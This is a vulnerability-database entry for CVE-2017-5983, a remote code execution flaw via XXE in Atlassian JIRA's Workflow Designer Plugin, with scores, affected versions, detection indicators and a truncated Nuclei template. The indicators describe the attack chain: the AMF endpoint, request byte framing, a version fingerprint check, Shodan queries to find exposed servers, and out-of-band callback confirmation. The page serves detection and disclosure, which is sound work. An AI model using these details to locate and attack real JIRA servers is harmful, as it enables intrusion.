CVE-2017-5983
published 2017-04-10CVE-2017-5983: The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to…
PriorityP267critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
16.24%
96.5th percentile
The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
Affected
66 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
| atlassian | jira | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/plugins/servlet/jwd/amf/
bytes
\x00\x00\x00\x00\x00\x01
bytes
\x0f
- →Exploit targets the AMF servlet endpoint at /plugins/servlet/jwd/amf/ via HTTP POST with Content-Type: application/xml, carrying a crafted AMF-framed XXE payload.
- →Fingerprint vulnerable JIRA instances by checking for the string 'title="JiraVersion"' in the body of /secure/Dashboard.jspa or /jira/secure/Dashboard.jspa before attempting exploitation.
- →The AMF request body begins with a fixed two-byte version field (\x00\x00), two-byte header count (\x00\x00), and two-byte message count (\x00\x01), followed by target/response URI length-prefixed strings — look for this binary framing in POST bodies to /plugins/servlet/jwd/amf/.
- →The XXE payload is embedded inside the AMF body and marked with byte 0x0f (xml_marker); detection should look for the 0x0f byte followed by an XML DOCTYPE/entity declaration in POST bodies to the AMF endpoint.
- →Shodan queries for exposed JIRA instances: search for http.title:"system dashboard - jira", http.component:"atlassian jira", or cpe:"cpe:2.3:a:atlassian:jira".
- →Successful exploitation is confirmed via out-of-band HTTP callback (interactsh); monitor for unexpected outbound HTTP connections originating from the JIRA server process following a POST to /plugins/servlet/jwd/amf/.
- ·The vulnerability affects JIRA Server versions BEFORE 6.3.0; the template name/title contains a typo stating '> 6.3.0' which is incorrect — detection and blocking should target instances running versions prior to 6.3.0.
- ·The exploit requires two sequential HTTP requests: first a GET to confirm the JIRA version fingerprint, then the POST AMF/XXE payload — single-request detections will miss the full attack chain.
- ·The POST request uses 'unsafe: true' in the Nuclei template, meaning it sends a raw/malformed HTTP request that standard HTTP libraries may reject; network-level detection (IDS/WAF) should inspect raw TCP streams to the AMF endpoint.
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
nuclei·CVSS 9.8
CVE-2017-5983 [CRITICAL] JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
Template:
id: CVE-2017-5983
info:
name: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
author: us3r777,Synacktiv
severity: critical
description: |
The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted se
No writeups or analysis indexed.
http://codewhitesec.blogspot.com/2017/04/amf.htmlhttp://www.securityfocus.com/bid/97379https://confluence.atlassian.com/jira063/jira-security-advisory-2017-03-09-875604401.htmlhttps://jira.atlassian.com/browse/JRASERVER-64077https://www.kb.cert.org/vuls/id/307983http://codewhitesec.blogspot.com/2017/04/amf.htmlhttp://www.securityfocus.com/bid/97379https://confluence.atlassian.com/jira063/jira-security-advisory-2017-03-09-875604401.htmlhttps://jira.atlassian.com/browse/JRASERVER-64077https://www.kb.cert.org/vuls/id/307983
2017-04-10
Published